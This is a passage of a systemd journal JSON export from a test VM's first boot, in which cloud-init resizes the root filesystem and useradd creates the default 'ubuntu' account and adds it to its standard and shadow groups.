"MESSAGE" : "EXT4-fs (vda1): resized filesystem to 5214459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=272;b=e2b08827b5804427b422c10c84f1567e;m=2904ac5;t=5bd16df53ca2c;x=c5f38dfaad45e50", "__REALTIME_TIMESTAMP" : "1615280817293868", "__MONOTONIC_TIMESTAMP" : "43010757", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : 
"/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "MESSAGE" : "new group: name=ubuntu, GID=1000", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817293679" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=273;b=e2b08827b5804427b422c10c84f1567e;m=29057f0;t=5bd16df53d757;x=b57edda67a1f8a7b", "__REALTIME_TIMESTAMP" : "1615280817297239", "__MONOTONIC_TIMESTAMP" : "43014128", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "new user: name=ubuntu, UID=1000, GID=1000, home=/home/ubuntu, shell=/bin/bash", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817297230" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=274;b=e2b08827b5804427b422c10c84f1567e;m=2908494;t=5bd16df5403fb;x=42b5819e6566f300", "__REALTIME_TIMESTAMP" : "1615280817308667", "__MONOTONIC_TIMESTAMP" : "43025556", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : 
"0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308652" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=275;b=e2b08827b5804427b422c10c84f1567e;m=2908559;t=5bd16df5404c1;x=9fd82976f351aa69", "__REALTIME_TIMESTAMP" : "1615280817308865", "__MONOTONIC_TIMESTAMP" : "43025753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=276;b=e2b08827b5804427b422c10c84f1567e;m=29085fd;t=5bd16df540565;x=eb66e0fb53002cec", "__REALTIME_TIMESTAMP" : "1615280817309029", "__MONOTONIC_TIMESTAMP" : 
"43025917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=277;b=e2b08827b5804427b422c10c84f1567e;m=2908694;t=5bd16df5405fb;x=64c01cd95089e67f", "__REALTIME_TIMESTAMP" : "1615280817309179", "__MONOTONIC_TIMESTAMP" : "43026068", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309172" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=278;b=e2b08827b5804427b422c10c84f1567e;m=2908715;t=5bd16df54067d;x=63b1f647f6212e20", "__REALTIME_TIMESTAMP" : "1615280817309309", "__MONOTONIC_TIMESTAMP" : "43026197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309302" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=279;b=e2b08827b5804427b422c10c84f1567e;m=2908797;t=5bd16df5406ff;x=f6a00f782b9ab0be", "__REALTIME_TIMESTAMP" : "1615280817309439", "__MONOTONIC_TIMESTAMP" : "43026327", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo 
video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309432" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27a;b=e2b08827b5804427b422c10c84f1567e;m=2908835;t=5bd16df54079d;x=5ac4c98ae56706a4", "__REALTIME_TIMESTAMP" : "1615280817309597", "__MONOTONIC_TIMESTAMP" : "43026485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309589" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27b;b=e2b08827b5804427b422c10c84f1567e;m=29088c1;t=5bd16df540828;x=3791b49dc7fdc319", "__REALTIME_TIMESTAMP" : "1615280817309736", "__MONOTONIC_TIMESTAMP" : "43026625", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", 
"_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27c;b=e2b08827b5804427b422c10c84f1567e;m=2908946;t=5bd16df5408ad;x=f662af4b76fbe91a", "__REALTIME_TIMESTAMP" : "1615280817309869", "__MONOTONIC_TIMESTAMP" : "43026758", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309862" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27d;b=e2b08827b5804427b422c10c84f1567e;m=29089cc;t=5bd16df540934;x=1f3068894cde168a", "__REALTIME_TIMESTAMP" : "1615280817310004", "__MONOTONIC_TIMESTAMP" : "43026892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : 
"b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309997" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27e;b=e2b08827b5804427b422c10c84f1567e;m=2908a4c;t=5bd16df5409b4;x=4f2b7d9150228540", "__REALTIME_TIMESTAMP" : "1615280817310132", "__MONOTONIC_TIMESTAMP" : "43027020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310125" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27f;b=e2b08827b5804427b422c10c84f1567e;m=2908ae3;t=5bd16df540a4a;x=6ccc14c1c1ab2dd3", "__REALTIME_TIMESTAMP" : "1615280817310282", "__MONOTONIC_TIMESTAMP" : "43027171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", 
"_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310275" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=280;b=e2b08827b5804427b422c10c84f1567e;m=2908b84;t=5bd16df540aec;x=751261d8bc9cc011", "__REALTIME_TIMESTAMP" : "1615280817310444", "__MONOTONIC_TIMESTAMP" : "43027332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310435" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=281;b=e2b08827b5804427b422c10c84f1567e;m=2908c12;t=5bd16df540b79;x=cc3b0e05082a5fcc", "__REALTIME_TIMESTAMP" : "1615280817310585", "__MONOTONIC_TIMESTAMP" : "43027474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310578" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=282;b=e2b08827b5804427b422c10c84f1567e;m=2908c94;t=5bd16df540bfb;x=785dfbc3f11eaeb2", "__REALTIME_TIMESTAMP" : "1615280817310715", "__MONOTONIC_TIMESTAMP" : "43027604", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310709" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=283;b=e2b08827b5804427b422c10c84f1567e;m=2908d1a;t=5bd16df540c81;x=e008fd5bb62252ab", "__REALTIME_TIMESTAMP" : "1615280817310849", 
"__MONOTONIC_TIMESTAMP" : "43027738", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310842" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=284;b=e2b08827b5804427b422c10c84f1567e;m=2908d9e;t=5bd16df540d05;x=e89d6773cff887e1", "__REALTIME_TIMESTAMP" : "1615280817310981", "__MONOTONIC_TIMESTAMP" : "43027870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310974" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=285;b=e2b08827b5804427b422c10c84f1567e;m=2908e20;t=5bd16df540d87;x=18af57c4ba9c414f", "__REALTIME_TIMESTAMP" : "1615280817311111", "__MONOTONIC_TIMESTAMP" : "43028000", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311105" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=286;b=e2b08827b5804427b422c10c84f1567e;m=2908ef8;t=5bd16df540e60;x=efc5bf646a38b30a", "__REALTIME_TIMESTAMP" : "1615280817311328", "__MONOTONIC_TIMESTAMP" : "43028216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev 
sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311319" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=287;b=e2b08827b5804427b422c10c84f1567e;m=2908f88;t=5bd16df540eef;x=3d2956e132d9a7aa", "__REALTIME_TIMESTAMP" : "1615280817311471", "__MONOTONIC_TIMESTAMP" : "43028360", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev 